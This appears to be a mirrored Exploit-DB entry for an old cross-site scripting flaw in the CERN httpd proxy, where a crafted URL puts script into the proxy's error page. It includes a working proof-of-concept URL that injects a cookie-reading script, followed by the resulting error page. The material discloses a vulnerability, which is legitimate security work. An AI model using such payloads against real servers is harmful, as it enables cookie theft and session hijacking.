bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/unix/remote/21704.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/5447/info
CERN httpd is a freely available HTTP server and HTTP proxy server available from the W3C.
The httpd Proxy is vulnerable to a cross site scripting attack.
The condition is present because of the way URLS are displayed in error messages. It is possible for arbitrary HTML or script code to be embedded in the error page through a maliciously constructed link. When the error is displayed, the script will be executed within the context of the proxy server's error page on the client browser. This may permit various web-based attacks including stealing cookies, etc.
Accessing the following URL with the browser configured to use CERN httpd as a proxy,
http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>
will cause CERN httpd Proxy to produce output like this:
========================================================
<HTML>
<HEAD>
<TITLE>Error Message</TITLE>
</HEAD>
<BODY>
<H1>Fatal Error 500</H1>
Can't Access Document: http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.
<P>
<B>Reason:</B> Can't locate remote host: nonexistenthost.google.com.
<P>
...
========================================================
Reference in a new issue View git blame Copy permalink